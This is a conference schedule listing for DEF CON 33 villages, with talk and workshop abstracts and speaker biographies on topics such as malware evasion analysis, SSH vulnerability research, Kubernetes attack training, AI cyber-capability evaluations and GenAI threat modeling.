Apurv has contributed to the latest SANS Institute's course FOR589 on Cybercrime Intelligence and is a contributing member of Curated Intel. He has delivered talks & workshops at national and international conferences like SANS OSINT Summit, SANS Cyber Defense Forum, DEFCON Blue Team Village, BSides Singapore, RootCon and others. Apurv is featured in major podcasts like ITSPMagazine, Tech Talks with Singh, etc. He is passionate about giving back to the community and helping others get into this field, and has delivered many talks and workshops in schools and colleges. He loves volunteering with StationX to help students navigate into Cybersecurity. In the past, he has also volunteered as a Darknet researcher at CTI League and EBCS Darknet Analysis group. He holds a master's degree in Information Security from Georgia Institute of Technology, USA.
He looks forward to the end of the day to play and stream one of the AAA games, Rainbow 6 Siege.
- ics Calendar file
If you have never participated in a Robo Sumo event before, welcome to the crowd! There are a number of resources online on this topic. We are lucky enough to have Pololu as a local resource. Their office is a short distance from the strip. They have have robots and parts to make robots. They can ship to your hotel if desired. Put something together and bring it down to show off and shove other bots around.
Please follow the "more info" link if you would like to know more.
- ics Calendar file
Locked down UART shell. Limited bootloader access. What's next? In this demo, we will perform a live firmware modification of a Hikvision security camera. Then we will show us getting a root shell via UART on our modified device.
SpeakerBio: Matt Brown
- ics Calendar file
Software defined radio (SDR) has become a staple in the RF Capture the Flag, both for contestants solving RF challenges, and for transmitting challenges. In this presentation, we will talk about some of the history of SDR in the RF CTF, the design goals for RF challenges, and how you can run your own challenges using challengectl, the same software that RFHS uses to transmit challenges for the RF CTF.
SpeakerBio: RedBaronDan enjoys capturing and manipulating wireless signals, especially when he can turn those signals into new Radio Frequency Capture the Flag (RFCTF) challenges.
- ics Calendar file
- ics Calendar file
Akib Sayyed is the Founder and Chief Security Consultant of Matrix-Shell Technologies, an India-based telecom-security firm he established in 2014. Recognised industry-wide as a 5G and telecom-signalling security specialist, Akib has spent more than a decade helping mobile-network operators, MVNOs and regulators uncover and remediate vulnerabilities across legacy (2G/3G/4G) and next-generation (5G Core, VoLTE/VoNR/VoWi-Fi) networks. His expertise spans protocol penetration testing (SS7, Diameter, GTP), radio-access assessments and security-automation tooling.
Under Akib’s leadership, Matrix-Shell has grown into India’s first NCCS-designated 5G Core security test lab and holds ISO/IEC 17025 accreditation for its methodology and results. A frequent conference speaker and Black Hat trainer, he also co-organises the Telecom Village community, where he shares latest threat-intel and open-source tools with the wider security ecosystem. linkedin.com
Across consulting engagements, Akib is known for delivering:
Driven by a mission to “secure the core,” Akib continues to advise operators on rolling out resilient 5G infrastructure, mentors the next wave of telecom-security engineers and contributes to global standards bodies shaping the future of mobile-network defence.
- ics Calendar file
Register in-person at the Aerospace Village starting Fri, 8 Aug, space is very limited.
Six teams of up to four people with prizes for the winning team in each session.
First session Saturday, 10am-1pm Second session Saturday, 2pm-5pm
- ics Calendar file
Register in-person at the Aerospace Village starting Fri, 8 Aug, space is very limited.
Six teams of up to four people with prizes for the winning team in each session.
First session Saturday, 10am-1pm Second session Saturday, 2pm-5pm
- ics Calendar file
Pig butchering scams are bleeding victims dry—more than $75 billion stolen globally—while thousands of trafficked slaves are forced to run these cons from scam compounds across Asia. These aren’t your typical romance scams; they’re military-grade psychological ops backed by transnational crime syndicates that have turned heartbreak into their most profitable business model. I’ll expose the full scope of this nightmare, tear apart the tech infrastructure behind it, and show how Operation Shamrock is fighting back. But here’s the thing—we need you in this fight. With open-source tools and good old-fashioned hacker ingenuity, we can educate potential marks, mobilize communities, and actively disrupt these criminal networks. No more sitting on the sidelines while these criminals destroy lives and exploit trafficking victims. It’s time to weaponize our skills and show these criminals what happens when they mess with the wrong community. Ready to scam the scammers?
SpeakerBio: Erin West, Operation ShamrockErin West used to put crypto criminals behind bars. Now she’s coming for the whole network. She’s a former career prosecutor, and now the founder of Operation Shamrock, a global nonprofit taking the fight to the scam lords running billion-dollar pig butchering ops out of trafficking compounds. She also hosts the podcast Stolen, where she exposes how love, crypto, and psy-ops fuel the internet’s darkest economy.
- ics Calendar file
Digital forensics is often a race against time to contain damage, with teams having to pain-stakingly sift through millions of diverse logs to confirm compromise and devise remediation steps. This slow, manual, and error-prone process often leads to hacker activity left unhindered for hours, days, or even weeks at a time.
To help accelerate forensic investigations and shorten compromise duration, we are extending Timesketch (an open-source collaborative digital forensics platform owned by Google), with agentic capabilities powered by Sec-Gemini (Google's experimental AI specialized in cybersecurity). This demo will showcase Sec-Gemini’s log analysis capability and how it provides findings in an easy-to-review, transparent manner via TimeSketch’s new AI panel.
Speakers:Dominik Swierad,Alex Kantchelian,Diana Kramer,Janosch Köpper,Maarten van DantzigSecurity Engineer at Google, specializing in digital forensics and incident response. Experience in the video game industry and consulting, working as an incident analyst, security consultant, and security engineer. Currently focused on applying AI and Large Language Models (LLMs) to streamline and enhance incident response workflows, specifically for investigations, automated reporting, and threat analysis.
SpeakerBio: Janosch Köpper, Security Engineer at GoogleJanosch Köpper is a Security Engineer on Google's Incident Response team, where he specializes in digital forensics, incident management and automation. He is a core maintainer of the open-source Timesketch project, used for collaborative forensic timeline analysis.
SpeakerBio: Maarten van Dantzig
- ics Calendar file
Sector Down is a high-stakes, immersive multiplayer card game where critical infrastructure and cybersecurity collide. Designed for teams of 5, 10, 15, or 20 players, this simulation pits defenders and attackers against each other in a race against the inevitable: The Doom Clock.
🛡️Defend or Disrupt
Players are divided into two sides: - Blue Team – Critical infrastructure defenders. Each Blue player manages a sector with three vital facilities: Physical, Network, and Financial. Their mission? Keep the systems alive and online while working together to run out the clock. - Red Team – Offensive disruptors. Red players attempt to take down facilities using calculated cyberattacks and chaos tactics. Their goal: force sector collapses and trigger the Doom Clock.
⏱️ Time-Based Tactics
The game progresses in strategic phases where players draw cards, take action using worker tokens, and discard based on hand limits. Watch out for unpredictable “White Plays”—random game events that add surprise twists every few rounds.
🔥 The Doom Clock
When half of all sectors or any core sectors go down, the Doom Clock starts ticking. Teams must respond fast: Blue must recover systems before the countdown hits zero, or Red claims victory.
🤝 Team Dynamics
🎮 Why You Should Play
Whether you're a strategist, a chaos agent, or just love competitive simulation, Sector Down challenges your mind and your teamwork. Can your team hold the line or will your sector go dark? Come play during DEF CON 33.
- ics Calendar file
Sector Down is a high-stakes, immersive multiplayer card game where critical infrastructure and cybersecurity collide. Designed for teams of 5, 10, 15, or 20 players, this simulation pits defenders and attackers against each other in a race against the inevitable: The Doom Clock.
🛡️Defend or Disrupt
Players are divided into two sides: - Blue Team – Critical infrastructure defenders. Each Blue player manages a sector with three vital facilities: Physical, Network, and Financial. Their mission? Keep the systems alive and online while working together to run out the clock. - Red Team – Offensive disruptors. Red players attempt to take down facilities using calculated cyberattacks and chaos tactics. Their goal: force sector collapses and trigger the Doom Clock.
⏱️ Time-Based Tactics
The game progresses in strategic phases where players draw cards, take action using worker tokens, and discard based on hand limits. Watch out for unpredictable “White Plays”—random game events that add surprise twists every few rounds.
🔥 The Doom Clock
When half of all sectors or any core sectors go down, the Doom Clock starts ticking. Teams must respond fast: Blue must recover systems before the countdown hits zero, or Red claims victory.
🤝 Team Dynamics
🎮 Why You Should Play
Whether you're a strategist, a chaos agent, or just love competitive simulation, Sector Down challenges your mind and your teamwork. Can your team hold the line or will your sector go dark? Come play during DEF CON 33.
- ics Calendar file
Come learn about and try our Micropython and microcontroller workshop, and learn about the secure boot tools for compute modules.
- ics Calendar file
Join us for a hands-on, interactive roundtable where devs, security folks, product people, and anyone curious can explore how to make security a natural part of software development. We’ll cover core Secure SDLC concepts, practical first steps, and helpful resources through an open, relaxed discussion.
Bring your ideas, experiences, and questions. Our goal is to learn from each other and share what’s worked best for us. No slides, no lectures – just real talk about building better, safer software and leaving behind the duct tape fixes for good.
SpeakerBio: W. Martín Villalba, C13 SecurityMartín is an application and product security consultant with over 15 years of industry experience. He founded C13 Security, where he specializes in Secure SDLC, pentesting, and vulnerability management. He is an active member of the InfoSec community, collaborating with local groups and global organizations such as BSides and OWASP. He also built InfoSecMap, an open-access platform for discovering InfoSec events and communities from all around the world.
- ics Calendar file
- ics Calendar file
How close are we to AI systems that can outperform human hackers? And could these same systems become our most powerful defensive tools against tomorrow's cyber threats? On Anthropic's Frontier Red Team, we've spent the last several months trying to answer these questions empirically by studying models and their capabilities across the cyber domain. In this talk, we'll present our framework for assessing the cybersecurity risks posed by increasingly powerful AI models, share results from our experiments on the offensive and defensive capabilities of Claude, and show how AI itself may be the key to securing our digital infrastructure against both human-directed and autonomous AI-powered attacks.
SpeakerBio: Newton Cheng, Anthropic
- ics Calendar file
An informational fireside chat about what OpenAI has learned from AIxCC, how we're moving our internal cybersecurity research forward, and how the audience can get involved.
Speakers:Ian Brelinsky,Matthew Knight,Dave Aitel
- ics Calendar file
Google Cloud Run offers a powerful way to run containerized applications without managing infrastructure—but with abstraction comes new security challenges. This 2-hour hands-on workshop will equip attendees with the skills to securely deploy and manage services on Cloud Run using DevSecOps principles, automated CI/CD pipelines, and GCP-native tools for policy enforcement and monitoring.
Participants will explore common security pitfalls, implement defense strategies, simulate attacks, and walk away with reusable blueprints to secure Cloud Run in real-world deployments.
* Hands-on:*
- Secure app deployment to Cloud Run with IAM restrictions
- CI/CD pipeline setup with scanning and auto-deploy on pass
- Apply least privilege roles to service accounts
* Hands-on:*
- Trigger policy violations or misconfig
- Capture alerts and interpret logs
- Dashboards for visibility
* Hands-on:*
- Apply policy templates for Cloud Run
- Test enforcement with a violating deployment
- Observe guardrails in action in GCP console
Nishant Sharma is a seasoned cybersecurity professional with deep expertise in cloud security, DevSecOps, and hands-on technical training. He is currently working as Head of Cybersecurity Research at SquareX (sqrx.com). He was in Cybersecurity education for 10+ years during which he served as VP Labs R&D at INE.com, headed R&D at Pentester Academy, developing thousands of host, networking and cloud security labs on AWS, GCP and Azure infrastructure. These labs were used by learners in 125+ countries. A frequent presenter at DEF CON, Black Hat, and OWASP events, and trainer/speaker/author to 10+ trainings, 15+ talks and 9+ open source tools.
- ics Calendar file
You can start with the best intentions, solid tools, and all the right policies, but what happens when your network moves from “effing around” straight into “finding out”? Join a panel of variously traumatized incident responders as we swap war stories, dissect lessons learned, and reflect on the chaos, comedy, and career paths that come with IR. This isn’t a dry postmortem — it’s a cathartic, honest, occasionally unhinged conversation about the realities of defending organizations when things go sideways. Whether you’re a grizzled responder or just IR-curious, come laugh, learn, and maybe even heal a little.
Alternate Titles For This Panel Could Include:
Incident Response: - Seemingly Innocuous Things That Now Trigger a Trauma Response - Looking for a Needle in a Needle Stack - But Policy Said We Were Logging That - The Art of Creating Sassy Codenames for Incidents - I’m Technically Not On Call During the Duration of This Panel - A Love Letter to the Passionate, Brilliant, and Slightly Broken People Who Keep It Together When Everything Breaks
Speakers:Ben Goerz,Casey Beaumont,Eno Dynowski,K SinghBen has been battling cyber attacks for more than a decade, first as a Threat Hunter-for-hire and then leading Blue Teams for multiple large companies.
SpeakerBio: Casey Beaumont, Director of Advanced Cyber Practices at Marsh McLennanCasey Beaumont is the Director of Advanced Cyber Practices at Marsh McLennan, a global financial and professional services firm in risk, strategy, and people. She oversees Incident Response, Advanced Consulting, Technical Risk Management, Cyber Threat Intelligence, Hunt, and Red Team. With over a decade of direct Incident Response experience before pivoting into management, she has evolved from pure investigation to incident lead and specializes in major incident documentation and tracking. An Arizona native, she holds various industry certifications and originally got started with a B.S.E in Computer Systems Engineering from Arizona State University and is wrapping up an MBA.
SpeakerBio: Eno DynowskiEno Dynowski is an Incident Response Consultant at CrowdStrike. He has investigated dozens of nation state espionage, ecrime, and insider threat engagements with clients across industry verticals. Previously, Eno was a Professional Services Intern at CrowdStrike, and a Platform Security intern at Tesla. He is a graduate of Loyola University Chicago, and is currently based in Chicago, IL.
SpeakerBio: K Singh"K" Singh is a Senior Incident Response Consultant at Mandiant, where he helps Fortune 500 companies, leading enterprises, and a wide range of organizations navigate high-stakes cybersecurity incidents. With experience spanning large-scale incident response, tabletop exercises, strategic security planning, and hands-on “dead disk” forensics, K has seen just about everything under the sun—and then some.
Before joining Mandiant, K served as a Senior Incident Response Consultant at CrowdStrike and as an Incident Response Consultant and Forensic Lab Manager with the Global Incident Response Practice at Cylance.
When he’s not untangling cyber crises, K is usually elbows-deep in a car project—grumbling about questionable engineering decisions and breaking things that, by all logic, should never break.
- ics Calendar file
Secure Shell (SSH) is finally fun again! After a wild two years, including a near-miss backdoor, clever cryptographic failures, unauthenticated remote code execution in OpenSSH, and piles of state machine bugs and authentication bypass issues, the security of SSH implementations has never been more relevant. This session is an extension of our 2024 work (Unexpected Exposures in the Secure Shell) and includes new research as well as big updates to our open source research and assessment tool, SSHamble.
References:
HD Moore is a pioneer of the cybersecurity industry who has dedicated his career to vulnerability research, network discovery, and software development since the 1990s. He is most recognized for creating Metasploit and is a passionate advocate for open-source software and vulnerability disclosure. HD serves as the CEO and founder of runZero, a provider of cutting-edge attack surface management and exposure management software. Prior to founding runZero, he held leadership positions at Atredis Partners, Rapid7, and BreakingPoint. HD's professional journey began with exploring telephone networks, developing exploits for the Department of Defense, and breaking into financial institutions. When he's not working, he enjoys hacking on weird Go projects, building janky electronics, running in circles, and playing single-player RPGs.
- ics Calendar file
In this session, we'll dive into the world of DBatLoader and its aggressive (and sometimes annoying!) approach to sandbox evasion. We’ll explore its use of anti-sandbox and anti-analysis tricks - From junk code and memory bombing, to arbitrary memory writes and AMSI unhooking, DBatLoader isn’t trying to go in stealthy - it’s here to wreck your sandbox. But don’t worry, it’s not all bad news. We’ll wrap up with ways to spot DBatLoader in the wild and counter its tactics, sharing some practical detection strategies and takeaways along the way.
SpeakerBio: Kyle "d4rksystem" Cucci, Staff Security Research Engineer @ ProofpointKyle Cucci is a malware analyst and detection engineer with Proofpoint’s Threat Research team. Previously, he led the forensic investigations and malware research teams at a large global bank. Kyle is the author of the book "Evasive Malware: A Field Guide to Detecting, Analyzing, and Defeating Advanced Threats" and is a regular speaker at conferences, speaking on topics like malware analysis, offensive security, and security engineering. In his free time, Kyle enjoys contributing to the community via open source tooling, research, and blogging.
- ics Calendar file
So, you've seen all the cool badges at Defcon and don't know where to start? Not an EE by trade? This talk is a 101 talk to show you how to start with open source components/modules, and how to tie it all together into a fully working badge, including some real world examples. This talk will walk you through prototyping on a breadboard to fully working badge in only a few easy steps.
SpeakerBio: Jeff "BigTaro" GeispergerJeff Geisperger is a security engineer with 15 years of experience specializing in hardware and device security. His work ranges from low-level firmware and embedded systems to the cloud services that power modern devices, with a focus on end-to-end security across the stack. Outside of his professional role, Jeff is active in the hardware hacking and badgelife communities. What began as a hobby collecting badges has grown into designing both indie and large-scale conference badges for thousands of attendees.
- ics Calendar file
This course introduces students to Security Operations Center (SOC) skills and tools, providing a comprehensive foundation in the essential skills required for SOC analysts. Through extensive hands-on exercises and labs that mirror real-life SOC tasks and technologies, students will gain a practical, skill-based understanding of modern security operations.
Key areas of focus will include text handling, packet dissection, and analysis, adversarial simulation, and detection engineering, equipping students with the expertise needed for various SOC tasks. The course emphasizes practical, foundational skills to ensure students are prepared to excel at core SOC tasks, this course will also introduce students to AI tools that improve SOC efficiency, accuracy, and response time in a rapidly evolving security landscape.
SpeakerBio: Rod Soto, Detection Engineer and Researcher at Splunk Threat Research TeamRod Soto has over 15 years of experience in information technology and security. He has worked in Security Operations Centers as a support engineer, soc engineer, security emergency response, and incident response. He is currently working as a detection engineer and researcher at Splunk Threat Research Team and has previously worked at Prolexic/AKAMAI, Splunk UBA, JASK (SOC Automation).
Rod Soto was the winner of the 2012 BlackHat Las Vegas CTF competition and Red Alert ICS CTF at DEFCON 2022 contest. He has spoken at ISSA, ISC2, OWASP, DEFCON, RSA Conference,Hackmiami, DerbyCon, Splunk .CONF, Black Hat,BSides, Underground Economy and also been featured in Rolling Stone Magazine, Pentest Magazine, Univision, BBC, Forbes, VICE, Fox News and CNN.
- ics Calendar file
This course introduces students to Security Operations Center (SOC) skills and tools, providing a comprehensive foundation in the essential skills required for SOC analysts. Through extensive hands-on exercises and labs that mirror real-life SOC tasks and technologies, students will gain a practical, skill-based understanding of modern security operations.
Key areas of focus will include text handling, packet dissection, and analysis, adversarial simulation, and detection engineering, equipping students with the expertise needed for various SOC tasks. The course emphasizes practical, foundational skills to ensure students are prepared to excel at core SOC tasks, this course will also introduce students to AI tools that improve SOC efficiency, accuracy, and response time in a rapidly evolving security landscape.
SpeakerBio: Rod Soto, Detection Engineer and Researcher at Splunk Threat Research TeamRod Soto has over 15 years of experience in information technology and security. He has worked in Security Operations Centers as a support engineer, soc engineer, security emergency response, and incident response. He is currently working as a detection engineer and researcher at Splunk Threat Research Team and has previously worked at Prolexic/AKAMAI, Splunk UBA, JASK (SOC Automation).
Rod Soto was the winner of the 2012 BlackHat Las Vegas CTF competition and Red Alert ICS CTF at DEFCON 2022 contest. He has spoken at ISSA, ISC2, OWASP, DEFCON, RSA Conference,Hackmiami, DerbyCon, Splunk .CONF, Black Hat,BSides, Underground Economy and also been featured in Rolling Stone Magazine, Pentest Magazine, Univision, BBC, Forbes, VICE, Fox News and CNN.
- ics Calendar file
We're kicking off right at 1000! Don't forget to check out our Merch table in the back of the village!
- ics Calendar file
When you are reverse engineering a file and have to repeatedly perform the same mundane task, you start to wonder how to perform the action automatically. This workshop provides the basis for automating tasks with Ghidra. We will look at a wiper used to target Ukrainian victims in late February 2022.
This four-hour workshop primarily focuses on how to automate repeated activities and how to think in a way that is supported by the analysis framework’s API. You can transfer this knowledge to other reverse engineering suites, although the specific API calls will differ. This class is perfect for aspiring and beginning analysts, while also providing background information and additional techniques for intermediate analysts.
The workshop’s materials consist of multiple malware samples, the precautions for which will be explained in-detail during the workshop, ensuring the safety and integrity of the systems of the attendees. An x86_64 laptop with Ubuntu 22.04 or later, along with Ghidra, Eclipse, and OpenJDK 21 is required. Its mandatory to be able to understand the basics of assembly language and decompiled code, and to be able to read and write Java. Python 2 can be used as a substitute if desired, but is not fully supported.
SpeakerBio: Max "Libra" Kersten, TrellixMax Kersten is a malware analyst, blogger, and speaker who aims to make malware analysis more approachable for those who are starting. In 2019, Max graduated cum laude with a bachelor's in IT & Cyber Security, during which Max also worked as an Android malware analyst. Currently, Max works as a senior malware analyst at Trellix, where he analyses APT malware and creates open-source tooling to aid such research. Over the past few years, Max spoke at international conferences, such as DEFCON, Black Hat (USA, EU, MEA, Asia), Botconf, Confidence-Conference, HackYeahPL, and HackFestCA. Additionally, he gave guest lectures and workshops for DEFCON, Botconf, several universities, and private entities.
- ics Calendar file
In this hands-on workshop you’ll move beyond the theory of network fingerprinting and actually use them in practice at both the TCP and TLS layers. Working in live lab environments, you will:
muonfp, p0f, ja3, ja3n and ja4Vlad is the co-founder and cybersecurity expert at ELLIO and President of the Anti-Malware Testing Standards Organization (AMTSO).A true cybersecurity enthusiast, Vlad’s passionate about network security, IoT, and cyber deception. Before ELLIO, he founded and led the Avast IoT Lab (now Gen Digital), developing security features and researching IoT threats. He has spoken at many conferences, including Web Summit and South by Southwest (SXSW), where he demonstrated IoT vulnerabilities.
- ics Calendar file
This workshop is designed to give students the skills they need to identify and defeat common evasion techniques used by malware. It’s broken up into three hands-on modules where students will work with a range of open-source (or otherwise free) tools to dig into malicious code, examine different evasion techniques, and learn how to circumvent them to better understand how the malware operates. We’ll be using a mix of instructor-created malware samples—with full source code provided so students can analyze both the binary and the code side-by-side—and real-world samples found in the wild. By the end of the workshop, students will walk away with several malware samples, pages of code to keep digging into on their own, and a solid toolkit of techniques for breaking through typical anti-analysis and evasion tricks used in modern malware.
Speakers:Kyle "d4rksystem" Cucci,Randy PargmanKyle Cucci is a malware analyst and detection engineer with Proofpoint’s Threat Research team. Previously, he led the forensic investigations and malware research teams at a large global bank. Kyle is the author of the book "Evasive Malware: A Field Guide to Detecting, Analyzing, and Defeating Advanced Threats" and is a regular speaker at conferences, speaking on topics like malware analysis, offensive security, and security engineering. In his free time, Kyle enjoys contributing to the community via open source tooling, research, and blogging.
SpeakerBio: Randy Pargman, Director, Threat Detection @ ProofpointRandy leads threat detection and engineering teams at Proofpoint, using custom dynamic sandbox systems to detect evasive malware and phishing threats that target customers around the world. He previously led threat hunting and endpoint detection engineering at Binary Defense, and investigated botnets and other cyber criminal activities as a member of the FBI Cyber Action Team and Seattle Cyber Task Force. Randy currently volunteers as a digital forensic analyst with The DFIR Report, and organizes DEATHCon, a global conference for Detection Engineering and Threat Hunting workshops.
- ics Calendar file
Traditional patching has failed to scale - it’s time for a new approach. This hands-on workshop teaches you to eliminate entire bug classes with modern browser security features instead of endlessly reacting to reports. Instead of firefighting the same issues, you’ll learn how Content-Security-Policy v3, Trusted Types, and Sec-Fetch-Metadata go beyond traditional OWASP recommendations to prevent vulnerabilities at scale.
You’ll work with a training app that’s already secured, but we’ll go further. By applying advanced browser defenses, testing effectiveness, and enforcing security at scale, you’ll experience firsthand how modern web standards protect both new and legacy systems.
This isn’t just about fixing issues - it’s about scaling security across an organization. We’ll explore measuring adoption across hundreds of services, automating enforcement, and applying defense-in-depth beyond single vulnerabilities.
Through interactive group challenges, you’ll tackle real-world vulnerabilities, enforce modern safeguards, and transform how you approach web security. Whether you’re a developer, security engineer, or architect, you’ll leave with practical tools and a proactive security mindset - moving from patching to prevention.
SpeakerBio: Javan Rasokat, Application Security Architect and Security ResearcherJavan is a Senior Application Security Specialist at Sage, helping product teams enhance security throughout the software development lifecycle. On the side, he lectures Secure Coding at DHBW University in Germany. His journey as an ethical hacker began young, where he began to automate online games using bots and identified security bugs, which he then reported to the game operators. Javan made his interests into his profession and began as a full stack web and mobile engineer before transitioning into a passionate security consultant. Javan holds a Master’s degree in IT Security Management and several certifications, including GXPN, AIGP, CISSP, CCSP, and CSSLP. He has shared his research at conferences, including OWASP Global AppSec, DEFCON, and HITB.
- ics Calendar file
As AI becomes integral to critical systems, its vulnerabilities to adversarial attacks and data-related weaknesses pose serious risks. This interactive, one-day training is designed for AI practitioners, researchers, and security professionals to understand and mitigate these challenges. Participants will gain a comprehensive foundation in AI security, exploring adversarial attack techniques, defense mechanisms, and best practices for building robust datasets.
Speakers:Vishal "Vish" Thakur,John "Jlo" LopesVishal Thakur is a seasoned expert in the information security industry, with extensive experience in hands-on technical roles specializing in Incident Response, Emerging Threats, Malware Analysis, and Research. Over the years, Vishal has developed a strong reputation for his deep technical expertise and ability to address complex security challenges.
He has shared his research and insights at prominent international conferences, including BlackHat, DEFCON, FIRST, and the SANS DFIR Summit, where his sessions have been highly regarded for their depth and practical relevance. Additionally, Vishal has delivered training and workshops at BlackHat and the FIRST Conference, equipping participants with cutting-edge skills and techniques. Vishal currently leads the Incident Response function for APAC region at Atlassian.
SpeakerBio: John "Jlo" LopesJohn Lopes is a passionate information security professional with specialist knowledge in digital forensics and incident response (DFIR), cyber threat intelligence and offensive security practices. He has over 20 years industry experience with a proven ability to help organisations defend and protect against cyber threats. John is a member of Institute of Electronic and Electrical Engineers (IEEE), International Information System Security Certification Consortium Inc. (ISC2) and a member of the Information Systems Audit and Control Association (ISACA). John has worked in roles as a part of the Global Incident Response Teams at Salesforce and AWS.
- ics Calendar file
This hands-on workshop explores the offensive and defensive security challenges of Generative AI (GenAI). In the first half, participants will use structured frameworks and rapid threat prototyping to map out real-world GenAI risks such as - prompt injection, data poisoning, and model leakage. Working in teams, you'll threat model a GenAI system using simplified STRIDE and Rapid threat prototyping techniques and visual diagrams.
The second half flips the script: you'll build lightweight security tools that harness GenAI for good crafting utilities. No prior AI experience is required; everything is explained as we go.
This workshop is ideal for red teamers, security engineers, and curious builders. Just bring basic Python familiarity and a laptop - we’ll supply the rest.
You’ll walk away with real-world threat models, working tool prototypes, and a clear framework for breaking and securing AI systems in your org.
Speakers:Ashwin Iyer,Ritika VermaAshwin Iyer is a cybersecurity architect with 12+ years of experience across red teaming, threat modeling, and cloud security. He currently leads offensive security for mergers and acquisitions at Visa Inc., conducting advanced penetration tests and threat evaluations of critical financial infrastructure.
Previously at SAP Ariba, he built and led the red team program, developing internal CTFs, defining SOC SLAs, and identifying high-impact vulnerabilities across global B2B platforms.
Ashwin is an EC-Council CodeRed instructor (Session Hijacking & Prevention), a reviewer for Hands-On Red Team Tactics (Packt), and a contributor to PCI SSC’s segmentation guidance for modern networks. He has delivered hands-on workshops at BSidesSF, HackGDL, and Pacific Hackers on topics like GenAI threat modeling, Practical Threat Modeling for Agile.
He holds certifications including OSCP, OSEP, GCPN, OSMR, CTMP and few others. When not hacking cloud platforms or vendor portals, he’s mentoring teams on how to think like attackers.
SpeakerBio: Ritika Verma, AI Security Research AssistantRitika Verma is a cybersecurity engineer and AI security researcher with 7.5+ years of experience across enterprise security, cloud infrastructure, and applied AI. She has led security initiatives at SAP and Accenture, where she implemented MITRE ATT&CK frameworks, automated detection pipelines, and secured large-scale IAM and DLP environments.
Currently pursuing her MS in Information Systems with an AI/ML focus at Santa Clara University, Ritika researches LLM security, RAG pipelines, and GenAI abuse patterns. Her open-source projects — including an AWS vulnerability triage agent (VISTA), a RAG-based compliance engine, and a CI/CD DevSecOps pipeline — reflect her obsession with bridging security engineering and real-world AI applications.
She has placed 2nd in a Pre-Defcon CTF hosted at Google, mentored future security talent through WiCyS and NIST/NICE, and served as President of the SCU AI Club. Ritika is passionate about building secure-by-default systems, mentoring women in cybersecurity, and rethinking how LLMs are evaluated and abused in production environments.
- ics Calendar file
The Internet is a dangerous place. Fortunately, hackers have created tools to make it safer. VPNs anonymize traffic but still expose IP addresses. Companies claim not to log, but how quickly will they hand over our data when they receive a warrant? Tor networks reroute traffic, but performance suffers as a result. Can we trust these distributed networks? Who owns the exit nodes? Finally, apps like Signal offer E2EE secure comms but in a proprietary and siloed way. Open source means very little if an app operates in a Walled Garden. Are there back doors? Is our data really safe?
In this workshop we'll create a Hacker VPN that combines the best of VPNs, Tor, and E2EE secure comms apps. We'll use modern-day PQC encryption to implement a secure protocol. We'll use both TCP/UDP as our network protocols to demonstrate flexibility in design. We'll support packet sharding, random noise injection, multi-hop routing, and 100% anonymity between network endpoints. We'll do all this on Linux with standard C++, CMake & OpenSSL. At the end of this workshop you'll have all the tools you need to take the Hacker VPN to the next level. Why trust outdated software from shady companies when you can build your own modern day, kick-ass implementation?
Yes, the Internet is a dangerous place. But it's much safer when we take control.
Speakers:Eijah,Benjamin "Cave Twink" WoodillEijah is the founder of Code Siren, LLC and has 25+ years of experience in software development. He is the creator of Polynom, the world's first CNSA Suite 2.0 PQC collaboration app. He is also the developer of Demonsaw, an encrypted communications platform that allows you to share information without fear of data collection or surveillance. Before that Eijah was a Lead Programmer at Rockstar Games where he created Grand Theft Auto V and Red Dead Redemption 2. In 2007, Eijah hacked multiple implementations of the Advanced Access Content System (AACS) protocol and released the first Blu-ray device keys under the pseudonym, ATARI Vampire. He has been a faculty member at multiple colleges, has spoken at DEF CON and other security conferences, and holds a master’s degree in Computer Science. Eijah is an active member of the hacking community and is an avid proponent of Internet freedom.
SpeakerBio: Benjamin "Cave Twink" WoodillBenjamin is a technology professional and lifelong hacker whose journey began with an Amiga 1000 and an endless sense of curiosity. He taught himself how to keep it running—troubleshooting, repairing failed components, and learning the ins and outs of the machine. From there, he moved on to DOS on a Packard Bell and eventually to building custom systems. That early hands-on experience evolved into a career spanning multiple industries and roles, where he designed, deployed, and managed complex networks and systems. While hardware remains a passion, his current work focuses on secure communications and building tools for resilient network infrastructure. When he’s not buried in RFCs, technical docs, or writing integrations, Benjamin is likely rock climbing or exploring underwater cave systems—boldly going where no man has gone before.
- ics Calendar file
There is a creature that lives inside our smartphones, laptops, and PCs, quietly driving their most cutting-edge behaviors. Much larger versions of it hide in datacenters around the world, constantly crunching through massive computation problems. And yet, even experienced engineers find it mysterious. Originally made to boost graphics performance, it has evolved into the engine that powers technologies behind systems like Claude and ChatGPT. In this workshop, we will uncover the nature of this creature: the GPU. Starting with its history and evolution, we will explore how a processor meant to accelerate 3D graphics became the driving force behind modern machine learning and AI. Along the way, we will dive into the design and behavior of neural networks, and discover how a machine built for graphics rendering learned to interpret images and speak human language. Finally, we will investigate how the complexity of neural networks made possible by GPUs can lead to unexpected and strange behaviors... some of which may not be accidental.
SpeakerBio: eigentouristEigentourist is a programmer who learned the craft in the early 1980s. He began formal education in computer science when the height of software engineering discipline meant avoiding the use of GOTO statements. Over the course of his career, he has created code of beautiful simplicity and elegance, and of horrific complexity and unpredictability. Sometimes, it's hard to tell which was which. Today, he works on systems integration and engineering in the healthcare industry.
- ics Calendar file
What threats are hidden in network traffic? In this hands-on course, we’ll show you how to spot malicious activity hiding in plain sight. Learn how to filter noise, detect C2 traffic, and uncover stealthy attacks using real-world packet captures. Whether you're into blue teaming, incident response, or just love dissecting packets, this session will sharpen your network forensics skills!
SpeakerBio: Chris Greer, Packet AnalystChris is a Packet Analyst at Packet Pioneer, specializing in network performance analysis and forensics using Wireshark. Whether he's investigating complex issues at the packet level or leading hands-on training sessions, Chris is passionate about helping others master the art of packet analysis.
As a certified instructor and active contributor to the Wireshark Foundation, he regularly teaches interactive Wireshark courses for audiences of all sizes. Chris also shares bite-sized tips, analysis techniques, and troubleshooting strategies on his YouTube channel—making network forensics more accessible to analysts at every level.
- ics Calendar file
Kubernetes is now at the heart of modern infrastructure, yet offensive security content targeting real-world K8s exploitation is still underrepresented—even at DEF CON. K8sploitation: Hacking Kubernetes the Fun Way fills that gap by diving deep into hands‑on Kubernetes hacking techniques including privilege escalation, lateral movement, and control plane compromise. In this workshop, we set aside the buzzwords and focus on practical attacks and defenses drawn from real adversary tradecraft. Whether you’re a red teamer looking to understand how attackers think or a defender seeking to shore up your cluster’s security, you’ll gain invaluable insights through live demos, guided labs, and lessons learned from enterprise and government security operations. This session bridges cloud‑native technology with hands‑on offensive security training in a way that’s rare, relevant, and overdue.
